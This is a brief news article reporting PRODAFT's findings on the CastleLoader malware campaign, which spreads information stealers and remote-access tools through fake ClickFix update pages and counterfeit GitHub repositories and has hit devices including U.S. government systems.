Image by Xavier Cee, from Unsplash
CastleLoader Malware Campaign Hits U.S. Government and Developers
Reading time: 2 min
Last Updated: Jul 26, 2025
-
![Kiara Fabbri]()
-
![Sarah Frazier]()
Fact-Checked by Sarah Frazier Content Manager
A new and dangerous malware called CastleLoader is infecting users through fake websites and GitHub repositories.
In a rush? Here are the quick facts:
- CastleLoader malware infected 469 devices, including U.S. government systems.
- Malware spreads via fake ClickFix updates and GitHub repos.
- GitHub deception tricks developers into downloading malicious files.
Since its discovery in early 2025, CastleLoader has infected at least 469 devices across the world, including U.S. government systems, as first reported by cybersecurity firm PRODAFT.
Researchers explain that CastleLoader functions as a malware distribution platform, which spreads RedLine alongside StealC, DeerStealer, NetSupport RAT, and HijackLoader.
The malicious programs enable attackers to steal passwords, cookies, and crypto wallets, while providing them with remote access to victim devices.
Attackers use fake ClickFix phishing sites that mimic legitimate sources, such as Google Meet, browser updates, and document checks. Users who follow fake error correction instructions on the screen end up running malicious PowerShell commands, which initiate the infection sequence without their knowledge.
“Castle Loader is a new and active threat, rapidly adopted by various malicious campaigns to deploy an array of other loaders and stealers,” PRODAFT said, as reported by The Hacker News.
“Its sophisticated anti-analysis techniques and multi-stage infection process highlight its effectiveness as a primary distribution mechanism in the current threat landscape,” the researchers added.
CastleLoader also spreads through fake GitHub repositories that appear to host trusted developer tools. These deceptive pages lead users to install malware, exploiting trust in platforms like GitHub.
The malware also uses fake GitHub repositories, which pretend to host developer tools to spread its infection. Users who visit these deceptive pages end up installing malware because they trust the GitHub platform.
The researchers identify this malware as part of a broader MaaS operation. The C2 control panel provides hackers with real-time capabilities to manage infected systems, execute attacks, and modify their campaigns.
“This technique exploits developers’ trust in GitHub and their tendency to run installation commands from repositories that appear reputable,” PRODAFT noted.
With an infection rate of nearly 29%, experts warn users to avoid unfamiliar update sites and double-check all software sources..
Latest articles 
